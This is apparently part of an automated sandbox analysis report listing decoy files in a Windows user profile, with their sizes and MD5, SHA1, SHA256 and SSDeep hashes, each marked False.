SHA256: b646a2d623fea1d0c7b5715311c63cad5265012e18c73608a60e4783a99ed84d
SSDeep: 768:SBIsorT3ODNscYADD2bktY5p5Qx8W+8q0W9zi9Bh1OX2GDEHkb/Qj8fcMe:SBaexIADD2Kad0izKBD5GA8oj8fcJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pdn3smOfWiyL_KFEcP0.mp4 27.79 KB MD5: 264e091114380baafff89db141d25992
SHA1: 76e8f15b76c525397525b427c76a26bbdeeefaa7
SHA256: 2af11c1052af492c1ec92083aeafa4f6ebc096f72beb694fca7e5ff5926febff
SSDeep: 384:FqwHtEhNyUDg30dfXcKeMMimnEB20Ku635s7RNFi8/+fbWcno1UwuL/z4J/NK:FNNp+g3yXfJMHnWK135s7M82G1Ozms
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xe1YhHNVlwT k.wav 53.85 KB MD5: cbf65452a12516ca22b07afeccff4702
SHA1: 18de8569262c47f236ef76e38bb2683e6a70e05b
SHA256: 7d8f509b06cc6f8e2e893c41f64c4dd7c4fa0310ded0760e94807c8a269ad442
SSDeep: 1536:Z7wFCssE+8XgrsggTng7cZ6vjH5AKr+ZA1l:Z7yCssh8XSxDvtRyC1l
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_34_nkr.wav 28.56 KB MD5: 1a8c8db87962593a2c8626f4ebcb9fdb
SHA1: ce3b5a3afee1768cfa52f9a0a2d2c155cc3612e6
SHA256: a6b60a6d5cf2ca8b4d8bb728fcba68e8453a84cd077978e129280a907bca8dee
SSDeep: 768:mCPVpN6VJl20at9yvwpIARgMDyA2FDTQEoj87WP:vfoVJM8I/6MD/2FDij8qP
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\2 YiCSGLLTlIDeQ.doc 38.57 KB MD5: 5e140f4c16e6e8569e01f255a18afe50
SHA1: 4f5a67d2a423cbc0ba254f5fc67d1d4d0a03b234
SHA256: e59ca436f8368dce6294be2ec79c3a1c60169fc308b96bbbe48c785fd0573290
SSDeep: 768:PHXx4exO3oXqoYYejt4m2L/ly2WL4Gli7OR+5qQ8fQ0u76g+JboUGo:vuke2m2pZ3cRfXBUUGo
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3fgk.pps 96.47 KB MD5: 225c4fd395afb49f3ba778796a7668b9
SHA1: f0410c548dcf56ce77b8526f97e5472d27631a13
SHA256: e2c3acb603d98e3e24c207ad98dbe1ad2a8ce056ce9799fdaf099a3afd3dcc7e
SSDeep: 3072:XQPfH8tC+OOjX2G6EWCNT+pwl9VMOA7FO9RA7Dz:XQnn+OOXC3pwlYOARQRIz
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EGkqtCRNREaQo4XfBL.ods 66.42 KB MD5: 3401452e027a9ac973c9a96aad512423
SHA1: 5a15ce200f09cdebe72b8098c2d70c371e6d0cd6
SHA256: 8561609812984941bd7ec2909b89d7ca3dbf01ec39170394107d33821078a362
SSDeep: 1536:7lE9H+sA3dWr/QriWvEC666GqcdcC96jSyyMZQcC1xPh7:pEZ+18kriKPvqcdcCGSgC1xp7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\k0bYHnrNfY0Z01.docx 92.27 KB MD5: e95278f9e1bece859c04a8c50738b0e6
SHA1: 99076f6955fc9091c22e080101e1ca43a4cf2b3d
SHA256: 94742a5955b195652d126efe5004904787b8157972298caffafc45bc1ea2ecd6
SSDeep: 1536:ttsvcrKAAs45RUh9RrAJBViR3VTAcror8neoVkPkm12+PkggMysdAdgObbN:tYmXAsdrRrEBV63VTAcrorGeqPm12+k5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NU9iOZGfDM.xlsx 80.06 KB MD5: d0b2ceced52547988fb438a78204be98
SHA1: a28b35d707ff1d84406d02ea5140f7e6ad752019
SHA256: c99641d4e2e18589d10359d9ef24f5d407a0465727d329fc6cdf39de2d22adb1
SSDeep: 1536:/6Lc/CNAX8TFDKh5cpS3wFGrzx+qGDXjt7/MLPcxieWcdC:/gdFeh5qS3wFGrt+qGl7ELneWkC
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ol37DpMB ADCzniH6.docx 49.42 KB MD5: bc841900e459fc79ad18b000383b1d3f
SHA1: 1219212c2fb7fd7781b64eacf94743fe092e1ae0
SHA256: 29713b958d66879f9e302fac148d7f7c3c7c52a2fc9bd663c082d7b39e285310
SSDeep: 1536:V2r81VoqfVzcffNW8+OeF1xLAYPTvfEnAH9LRDk:VXHlWY8mFTAeyA/Dk
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OlNTdQSKj.csv 24.41 KB MD5: dfd1a00ef877041177782b80821ac091
SHA1: ed9472d7ca1ab03c074811d541aa9c5625b1d3b2
SHA256: d600921e24dd7f2d9017772fd117ae344f688c2e7ec7fba663bc474272b34e38
SSDeep: 768:6Dw9kV//N8hO9atke+F/vtBTOH6O9DpJL8d:IV//ek9gkPOV8d
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rMkTON600uD2.docx 14.82 KB MD5: e6fb1206da7405c67b567d35ce2e96dd
SHA1: fa88ddcfc138b19234dd849773e2f39dba811c45
SHA256: 700b523d07da2e66702a0bf578945c81453114dca49ab75001f93c801c9ec5d3
SSDeep: 384:0ewMTVJ0KUncBQETP4tfNFfhRO0u1JoPnugh:CncBQETP4tfNpK0u10
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yBWTsx0.xlsx 55.13 KB MD5: 9183dd0e2ef827df40a8855edd3b1c83
SHA1: dd60d6f2422a99544e6dca0953e1dd51eda8dd61
SHA256: 32036aa124e7093d9057bfb80252e4f03a6011638d6abaae6cab8a5d0928702b
SSDeep: 1536:NMe92juT0RIVwAn3gxKtf3s9M2XWv558EN:meouTZwAHtfsO2Wf8EN
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\3lDgGO6UTyrOsMHE.mp3 21.71 KB MD5: 400bd5cc32d07e77ba3857072940000f
SHA1: 8967653cf03fb6ef8bf873896d9b9cf6397d9a49
SHA256: c80f63ee419aa8c0f5e356987b44a1cf1b7078403d58256107a7a6941c070fac
SSDeep: 384:EYbE1OvpqEIg2keAfr2MtckerkguNmhRSO3372teohvaBft14POs1qq8kW:EpkvkEzKY2MterkgHRSO3CgAvaiqqM
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\Fnpi8zzFvSVq9mHNij76.wav 13.48 KB MD5: 1399415551397a3a37c0401e0a094bdf
SHA1: c0f982fb2ce58a4342a461be981df63c30dbbd72
SHA256: 040d4ebc5a1823c52c8708a92c9d8293493f6bb69c83347194ff8534b6161594
SSDeep: 384:PG5FoIJxYt1j4K3ilrNZmeN3TxC19LGahCc:uboIskJzATh7sc
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\HX-X27lPA60A4.m4a 75.24 KB MD5: 960f3ee367671c3b6b296c37a0374818
SHA1: 08b58b4abd47c2aab25abda51ae7d630173e613a
SHA256: f7f37063046a504960dd80d0dd38f804c74e358209b780c973e3a44b0731248a
SSDeep: 1536:iCdPpTnllUnZJ3FOZSCH1p7LMxYUbbF98PvcsHOuI/fdYMsI5Ad/LKdrTBL0:nPNllsAS41pLMx3grAH6/LKVTx0
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\i0vpbCxKUDj27FIiTrf.wav 1.32 KB MD5: dc023afc938307ceb60ae2ee38f4a2ca
SHA1: 9e18d8377b0b3b746948549c56d925e5bdef48a5
SHA256: 94c228faf47452173f1e66929c51476e656c8165cd32787bdbfa499bedab1fb5
SSDeep: 24:5SUCdEBJaiRxBzF3rf5KyrjDbEwyI7Z09irbh1W/e/TfMJASesbD:cunTzF3z5KYDwMZ09SbTW/gTEJASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\KbAGa_jf9A0p1.mp3 17.46 KB MD5: 01019a4a3526e2f12f5675d9fc792194
SHA1: 3dcd00af8fe143d84879d61c3b65e4d49ddeb2ed
SHA256: 144972a9c3ac29dfaa95496ed7ff425d087e23146083aafe2402b541dc6e35ee
SSDeep: 384:j/GwEgtM+r67S6YhFxcstRskE691vxlWG//YPsOWBTxHUOQEsYpkw:/tNWu1PcstRbE691vxlWG/TBFdGw
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\nexJic6.wav 87.04 KB MD5: 966eb4c59475ca28aa410b385857c288
SHA1: 2a14015bfc679f89162700568aa996a15d92f6b6
SHA256: e2ebace599efde031e66d2f1e7c7ee95cd50fbd70135ef5afe1edec83598a426
SSDeep: 1536:xNPoxibM3cWoMsgYNhhBls3zUFE0E61DqWqzrkY6JFktAoQ+Po14ni3U:/PCib0sMmjhHO6E41WfBItodQ14nik
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\ucbmmg-N-J.wav 51.13 KB MD5: ca7f726574a4263385be81a3e767efe7
SHA1: dcd48ca45bfee6bd9c80fc23fa6be58329aa9e55
SHA256: c2ddb89d543ba7a14a54fe8d10b069ce1a0a007b8243de393665f7a11094d7bb
SSDeep: 1536:hDL7bNOizU1xSeSHNOP6KeimVRtPUMkNczelliEg:hzbXzU1oMTtcB4N0emz
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\wEWdm1lt.wav 23.34 KB MD5: ea52e6e60309be9b489895d31d54c2e9
SHA1: 26ba6a53c2b879b740353566e967aa609bafe7af
SHA256: 912e5dbc29566ef13cc914f94aa9f4b67b59238db4e9d37530849fcd608d6272
SSDeep: 384:nBdtDp4LnsR8E/WFnYdkARNAwU/mlE++gUngtedfDp8oVfkgHoQdEg/c21mkoS:nBLDS7TFnYPA//0+g8xdfD+oViEEg/ci
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\wHquroq M2bDSunIrjJ.wav 34.66 KB MD5: ea48a62d7f60e83a223d5c724b580a69
SHA1: ae92597083873caae1dd250f3dc2be998ce9e781
SHA256: d745488601859a6040c9e1da40234da6a82834f3b3b55ee05d50c8961a347ca6
SSDeep: 768:tdyBsa9Gt/ZpKg63VNcgAq+h+OVTDLoEMa9WDtl/ZhS0ju7EzAGm:DyBNY/FIVNVQb7LMtlxhS0S7EzRm
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\_9l8.wav 20.99 KB MD5: 3b5cbe305a7e96753e63909e51547121
SHA1: a1264cd9503c7684ddeee9c7018d15f8340ec30e
SHA256: 42260742c32983508503cef635e34829dddfd4be24d12b1e19ecef73ab539ed3
SSDeep: 384:G5JWuVjiWWR3Olles1f5AKeGrG48omQh/3Y0z7ZkuiJ7xa8B7g5YVfvt78sGRSX:fcjidR3q1f/eG8eh/z7Ze7g8tg5YVSsb
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\jMNoGbN.gif 18.21 KB MD5: 78ecf9dfef979ee90da5b9629d86e82a
SHA1: 0bba239173a6415fbc7091f674290837e1956724
SHA256: 70caeaf7de86757aebbf84dbf458eeb5aa2508f04b96da7aa209793957375878
SSDeep: 384:Vzu9kPFI8+GYs3OzKePLbwlBPQ36jbL/TfoibUlKVsFvttWq:g9kPW3VIOjPf2dXf0ptAq
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MCZaDa0QQJ6wcNZUXn.gif 36.20 KB MD5: 8322d67adcd4cab36480ed7fa3ea80c9
SHA1: b46bf4d931122883621d3694ad600f9625acb45c
SHA256: 34b6d05af5a357d6ec2f296ab3f8d487f13b5ce98b2adb3dfb951b7aca5ec40e
SSDeep: 768:0/WGh2eksvErXVW2wm1b14NHrKUK9wWEUouLX+Y2:0/WGNgDHRyQrrX+Y2
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\QoXfvFeQOhQIV.png 2.93 KB MD5: 944aa30f4c25c8d6d53755a8e6fc1156
SHA1: e89061b2d5d4d700536b6d93c5ab1e8b33b8e7ab
SHA256: 93f4d1cae005b17d3a1038876e2278873b88fe5f16fc87cfd526f96ef01b7164
SSDeep: 48:yCXlHaG6UHRs0QJK/m+o22omnr3tw8y3RLDHPDQmY8VXTyaN8u0RtjScWL4BA5GF:VXlTRs0QJqOr3tw8w7KcThEtScWL4BU8
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\S4GQ2GGMfzy1DKUl.png 25.94 KB MD5: 69784f0217b8aacdff5c370c0e10e4e6
SHA1: 867f7ded76cb48421f06c332929387dd4b22d531
SHA256: 692998203c929c8553d25020f897449c9b411488dd858d72deddf213b6937af7
SSDeep: 768:VhAolBFQgdALdPhiDM7u6A3x7Vz4xdSFcX9sog:rHbjALdPhiw7u6whVzSdoymN
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\y18suG.gif 91.37 KB MD5: 80d20be50af8c7c51767cf8d07f0b321
SHA1: 72c766d82e4e7164d9c649f2c56ca1556421684b
SHA256: 9326e78b9ac9eaf19faec391a827651beede1a4ff68b11f0ae3e651471c6aaf1
SSDeep: 1536:qbQJaGD/qB07lvvin5BPMeqP+xlRRUHKpOmVWkgLc1tvcEkom/2krCmoAqmYiRWK:qbQQOqolQmeAQhg3KrvPkLOshow0vmJ/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M45yR7c437.avi 29.10 KB MD5: d1ea1a76a175dfbc7b1373b148c104b2
SHA1: 0998182fb7b9bf9bc72d75e8fff31cedc98bc6d4
SHA256: 8d5eef9d72bd6d76591b5f5057d2a5c7989b20447df2230d8b87cd6a85ec380c
SSDeep: 384:SjE8dm4VZ8YKOg8hSFgdfXGB84JtKTaoSDVz9bkB7wv8AAan1vGB3:WEcwhB8VVsyaVDVz2BsTAan1OB3
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\am8f6gN_e89TbRknT.wav 36.08 KB MD5: 88f64d3b0565fd747ad98a96b7d257c8
SHA1: ee17469a88476b37f90dd50e8a9f1761204b261c
SHA256: ad318ec7dad2be065932d32492bfe43d4a14891906ff6dabd781a409b74a1caf
SSDeep: 768:mWWK+pw7ktq/FB7ntHN28iGVNE8jsq98DlbXr/OFF1fQXx6iC:mjpw7ktqTjtZiAO8jsq9KlbjOXNQXVC
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\4_mbPPGlzHp_oUuJ-H3Z.bmp 34.42 KB MD5: 8e4847dce5b97081fe2064498abff925
SHA1: a547e4afab312c0a0581bc54a88db9eff08a0a86
SHA256: 58927b24f4a6eda348bf96d27af170aed63d1248ebfc2c3e0edafbfd0373f126
SSDeep: 768:cUL8WWC56kmAsJQNEDGCdw7fFYnKProylsj1N+oYEuk:nIC56kmAKQNEDTdw7fnDls6HEl
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\eMppgNp_d0eONIt.mp4 96.71 KB MD5: e587b0a838b4b52b68f33346f8605f00
SHA1: b61e4907ab6e2824c97e57430c78318376b0a792
SHA256: e887072f7f025a5155efc7df3605e3df0c375c4076dac574e61510e61e3cac66
SSDeep: 3072:TXnXEaZo/E2G00pXO5j5eRgxi/DOV7b22:TXNP2GvXqj5svOQ2
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\ok1IxJmM0MNDy1z2SKRW.odp 7.51 KB MD5: b13c4142f6535fbcc9f4e6e918b72fd6
SHA1: 048c1c63b5701549e7ac975aa7610fdbc53ea0ae
SHA256: 2cb5d7d7fe427e73aba450b2de6bcec5ed71673e3bafe73a1331d1784992e9b5
SSDeep: 192:NyNw1zEeiS8WY/jAiUenm3w0dORNfb3u5j5ZnJIL0pv1CwmAYLizOuV:Nye5EVS8JkiUGcw02fbezZeHhtOr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wpZkXn.mp4 55.67 KB MD5: 0099dbe4330e95d8aaae64cbf5b69f88
SHA1: b073d1361650f1db0ebd65b2dd91aacbb64e4891
SHA256: fa8f530c03b21ce91f8d2a70ba9881fb58d95371a4d02f55f884c350fcf7d386
SSDeep: 1536:RwPP919CEWj+oGViS+MRL20smHrONnoZbw1iXby7iO:yGEU21rLOSZs1+O7iO
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\68l k.odp 30.90 KB MD5: 3153dabac9ad6354f4ce50a3810dbfed
SHA1: 4278d661e9bbcd4d3af837f70c99c1bbace497d4
SHA256: 960e9d81b970bb99b5481626f102519059c5dd23edd02602d889c3dd80fb5209
SSDeep: 768:CjKGmNE3g0drCbSaFHKP3vY8vh+1MtqnFBibqMA5:CHgmhSFHKY8OMkF4bK5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url 211 bytes MD5: 786702269a5d3c946d5a6d9c4290a038
SHA1: f85429fed679befb11968cee874a55c364808ae3
SHA256: c2e134fb783bf97c0029aab00d4400e570a86cf866aa7f8ab6a1f6ca6bb84167
SSDeep: 6:Jnj6/BPUn3fTDJEP0udkqSMeEPh7Wcii96Z:lEc3fTtEP0BqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url 211 bytes MD5: ba29779ff2e0ee9c63881b82414c7817
SHA1: e6b99ff29f9251dcdfd99b59691ffd90d0486b01
SHA256: 17219dc2233bc980c21ab522dd5b7b94cba82f3683515068ac20828a5a8f9b4b
SSDeep: 6:Jnj6/BPUn3fTDJEXT+RudkqSMeEPh7Wcii96Z:lEc3fTtEiRBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url 211 bytes MD5: 9f67f9fb6faa065ea859a6fd12352372
SHA1: bbfa8497f422f7cab00170f74c93f7338759af22
SHA256: b32040b1aeaaccac0711fa3ae323fd69f4db295a84f3118f4000f52fad7778af
SSDeep: 6:Jnj6/BPUn3fTDJEk76udkqSMeEPh7Wcii96Z:lEc3fTtETBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url 211 bytes MD5: 8afd56f9bcbf1c4d21f1e2bd7ae4e6f0
SHA1: 41bc8f23f7decbead65ca26dee0815da9616aec1
SHA256: 2000969331884a5e8650b95157a6870b4b7fcc40062390fbfd224760b0aa279f
SSDeep: 6:Jnj6/BPUn3fTDJEk7XgYudkqSMeEPh7Wcii96Z:lEc3fTtE0BqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url 211 bytes MD5: 487d84485ed1e57b4df93abf173f80c5
SHA1: b6d5bf286bacb0455e19daee1b0e8dcf843f5659
SHA256: c1e1cfab4a9fbaff245bd0bf45e12609db30e8c2165756f21cf2289646d67d07
SSDeep: 6:Jnj6/BPUn3fTDJEkSYudkqSMeEPh7Wcii96Z:lEc3fTtE1YBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url 211 bytes MD5: 2e1c0543a131e66d546f46c5fa4bad05
SHA1: 6f1e29ec0ed00435b76ea96b237a852052740af2
SHA256: aa16ae4bb0e8069cdd77a6f75e8b1e1196cd32dc4b9db41629c5dbe809bf8ce4
SSDeep: 6:Jnj6/BPUn3fTDJEk5Z+RudkqSMeEPh7Wcii96Z:lEc3fTtECARBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url 211 bytes MD5: dddf68f82863a8b2d5f686f182352537
SHA1: 7ed46102603fd6c9b1482f1353196cd71957f928
SHA256: 15ed0eb57e3e55d9f44404447788f28deb902a17b8419041f38851716279ef87
SSDeep: 6:Jnj6/BPUn3fTDJEkqrYYudkqSMeEPh7Wcii96Z:lEc3fTtEpYYBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\MChYwIiGCBst93Q.wav 25.54 KB MD5: 2526c7333349b83a4181c1fc22f3864f
SHA1: 1b71baf99312c9e900aeb3abb943eb3136054c63
SHA256: 8741cbdfbbaa55408e05f6dd0f2ae3dd201cec2f6d95e5f129da8557102f363d
SSDeep: 384:XUjVIiMAhhyCmnQpvC65KXvHDZlBMApOlX2mU/0ISeKA1dsx+/rBIjvx6cctX:km9khZx1Xc1QAG7I7N1YuBI16xX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\twAQxH8FOS.m4a 21.87 KB MD5: 4130b2307ab86ceafef768fa446e6164
SHA1: 32d7267d53bcd6dac1624dbd921d2d5bbe7af0df
SHA256: 166b046fbd8be87e0c45d11b62be582f7a8436d58a7520726d1cece0bcbd3085
SSDeep: 384:9U45r09ooSV45oSbXtrASd5Z8dUbP1UXiC4ZH84yZMi:9UDSoSV4T9rAYz8mj1vtZH8vMi
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\AfHqN B.gif 74.51 KB MD5: cc3ea809425bcb2afa051a609e2d8237
SHA1: b1433efbceb1cf0730da3f0a3b167cb0b77c8391
SHA256: 3124694a2e8fba2dda837e636db4bb640ea94f26565d5e24946638bc26ff60e0
SSDeep: 1536:YVf0WAc5SAkGfmN9VQJ9XT2z8nrKLUiEuPhrlvFRjQOtPXh9s7:Yp0WAc7efyj2zI+LU3uPhFIOtPXg7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\UYXfotd1.png 99.97 KB MD5: 85ae48128d696a6f1041ca14e787938e
SHA1: c982f6b7c93ad9b47cbbb9de06d67660e2a7d3ef
SHA256: 1fde54035a598177cef4833f096a78c38c3fe30486b1abf927ba1544d5008c6e
SSDeep: 1536:e+bywb3ud2uSxxZR0c0ZTeViTBvio1dSCXxS+l3OJBQKnObZEuj7nNrKmWgbm:eRwbmIV0tfZjnrS+l+JVObZEuXNer
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\v9Hxi uz2vt-5XDoxdC.bmp 46.89 KB MD5: 8e2a383651d0f976c4a65f7ec62f3245
SHA1: d4ae9be2bec7dd53496ddb2303048c77ed239bb6
SHA256: e353f1af148a7077f8d356f6909c26aabc91be97001985e1c2fffdf88972c291
SSDeep: 768:7fBdUq/12nBvoRKypCloEG46UCafS90/fFRIABulh2t67iJXJ3iLJvBeYvGfczAx:bU8kBgpClPh9fSa/fFRDBuStVJ2tmfcI
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\IE-asuVeDit5fMSdkB0.flv 42.38 KB MD5: 38e919a2dfe48fc6708e1896a88f41b7
SHA1: 4393e159d9da36b2ae91c921526085f91bc8eb5c
SHA256: a5ea6cf0675884b1d2919087611cebfe8cb0eefa0d1ac7abe01ebd070336d0c7
SSDeep: 768:cOUGBjYv1ym8mggzWl6pJT4YjgsgL7tDdkI/6Xu/TK5uWQdVMGxFHvnAX:cOrjYUm8mggS6pFFgLxDd/655ulx5IX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\F0eUqh0cOkUTa7DO.docx 74.37 KB MD5: 2738515c7d6579e640e995d114d97525
SHA1: e6b59e26ece4e0a12964ca42d6a2f3f335b0ddb3
SHA256: c89a26e2a731c1036955ba35f249190c9ddc145b92a849238ee949fd55b6d42c
SSDeep: 1536:sFVQGpGJNxHwhxu7YA6MOFq1dP0MxVwCZWjjWrhbNUn//9D3lO0c62:AGJNXYAaY1dsMTwCZ2WlhUnzY62
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\FN--.ods 83.57 KB MD5: f0840d2cb218212f83743ff6964b7340
SHA1: 81fb44c2894fb02adfb21c0eed45c47ac515e329
SHA256: 890d44ae4d6976dde372420aae94080c6e5e71b4c611d09b6283e22ed87d98bb
SSDeep: 1536:Ai2bSh6h3bowisl1a99OEFm1NdtNLbyIlkdCnIIWxUVY5n0eW4xIiUpyGh5:ADVQItLdOxGY5rWdLp/r
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\K_RwYW.odt 48.14 KB MD5: 43fd92fcdb4de2ce54f3596f042590ac
SHA1: 096ba45c46658cb782938bf35c5100cd970a317b
SHA256: b453ee433b55634aa6af66f9be3e3e543da0e50b5faba30d7de0ce47c6697a79
SSDeep: 1536:XJIO3oXTu9VuLXiXqe0cgKeYaJlvsjA3D:XJqXiTu+d0cgPRsj6D
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\NxEBIllQ9 cZLQxHAnf.xlsx 71.89 KB MD5: e0c40cf202a5945e15d37209b8bea4f2
SHA1: ced83af7244b489a226add766c3f855d491c0786
SHA256: eb4c378bd92752babc34d1cb13ff0b0d1d99d72cdc3bad56265ba7f025726ca9
SSDeep: 1536:2m6hvjHSBO829pVTmNn+z6Rff7SRikHI84PhK+pdp/lTAtPzF:T8jHZlvTmZ+ETYHIfn3p/cLF
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\ypdm7CG6ozW8_F3RQh.pps 49.35 KB MD5: f9104c315a5a5d81882c8abe10b709ec
SHA1: 45fcb42567d602306cf91b112c6829a0c3d0eca0
SHA256: 3c8fc56e177e1fd84731af14fee2f5dcf4b604794b42f17ed4d64b80368efb6c
SSDeep: 1536:gAJTGNScIEXz2ePNhVtSVDqjsx6Li9/PC6T:5JT4Scpz/PVtSVgi93VT
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\1m7527vbdeC.gif 31.58 KB MD5: 5418d00984b392759933d37dfb9eca1a
SHA1: 23e5853d96c966f6a05e96f2a7cbe075305e27a8
SHA256: 35c5aefbff49a055f906e44165c0d04221c2cf51f0e2d13162d506a953431355
SSDeep: 768:kYPBAt5sI7ArsVfDKOnfnsszHqTi3+M2gFYZ:kft5sI7LLbLIrMYZ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\cSaVaB0sUlp.gif 39.49 KB MD5: add4a6fd45265ee9b1f4e0438d187ff5
SHA1: 560db52267f1a3c42c96a4bbc6b2e30c9027ae59
SHA256: 2cb25ba732df00db6d9eae720c6d6b511e3e7955efa13dbaa301d013e1adbf01
SSDeep: 768:dqi/d1ROwHkZZ4/Nt8pF9zdQn8pdWH0hSfNrfMhUFNRlToSOrqGiab7OD4yM:dV1ROokWPez9/WU4pSuw92GSbM
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\EWTals.png 5.45 KB MD5: 50d59d0e9fcad45acbd8d22ff92538a2
SHA1: 24d970e51211c1b40f1a33297f55b4549dc87980
SHA256: 686fe5550098c2c12edebbe51aa8d9bb1c32c8303ff7d37d372190cfeca8328c
SSDeep: 96:VZIo6UcRFpShGQrO9Sp0HRuXKg9ThnWr8c6jE5tA3uRdH84Rq+6jS5N:VZIh55/6iSfdhnjIWe9b62T
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\TK27wDdNd6Xfl 2b_k_.gif 75.83 KB MD5: c1f3525766c1eb30cd5adfe3b9130536
SHA1: 69c9c26812d952d737afdec4a392c45cc5c6e181
SHA256: fc3368dace7f7f68599b86475e1e7163c3000d18a8724f8f2ee60df78bdad94b
SSDeep: 1536:DBXNBAB6DfAr2EV28pxLGVblYSAjBC7IKVFnKWiErkwFoLjOM7sLbNyW:p3DfO2EV2elibRUBCsKVB1iEbq5W
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\Wqelj SIFg-o4.png 19.23 KB MD5: b60b5afc39c6460ad15f4e1c20a32abc
SHA1: a553047b87cc166a4b2a9cc2cbf896a3475a7b32
SHA256: 393daa1283c60ae64f4c3e4888ab28808d627dcc48b3d92233212c21333816cb
SSDeep: 384:VCp06afKXdFeZ2zerxDaKvyQqhgtpJPZcGg4TU2pnkCJn/LdLGsnWO5W71PomSZj:VCi6uWuDdShg3vXgZ2Pd/hLfnJW7lODp
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\p-qIG.doc 37.24 KB MD5: 34e8400dfa2348c3bafa2a71a2409cb9
SHA1: 95ce0a9a664f8e12a59163bab72e5a006179b757
SHA256: c5861a09000ba5c9cddf5c6c2b4dbf68d5a388e17d2a6575a59d212cd81fab50
SSDeep: 768:FiBQSbQJnxQLZViPUIuAJU9KfkCdZ9CIXk0wHaGxVilBdX4:FcQSbAnOLZscIpU9KbdLPLwbfiC
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\B2EsvKtcKir28U.mkv 70.42 KB MD5: a4fb436cca72708e1857e1d841ed5e0d
SHA1: 19d78befc8eb0166e5307fd2df01aa49e940f68e
SHA256: ca305d256888973a210725a4d17cacafcafda64404b479a94edbd19793388cfb
SSDeep: 1536:eBRVlXmMJEDsXJKyedz6V9Q0R9lpbN8I8MoNuZukXD:eB3lWYEcJny+Q0R9zNgMoNuvXD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Jf 8.avi 53.11 KB MD5: 70f48e2798e73cd97d298047e558f293
SHA1: 561eb2878f5a6eea52f17b06425f22c2bec4c573
SHA256: f5bad3b641a09a63655ae775be2d99b2b2fd3ea41c5cf92581d4ebaa4e9bb9c4
SSDeep: 1536:ei50fQcsej8nB7YsoHX/p43tWPne7rsq8DMia70un:ei50VP8nFYXHX/gWPyWaV
False
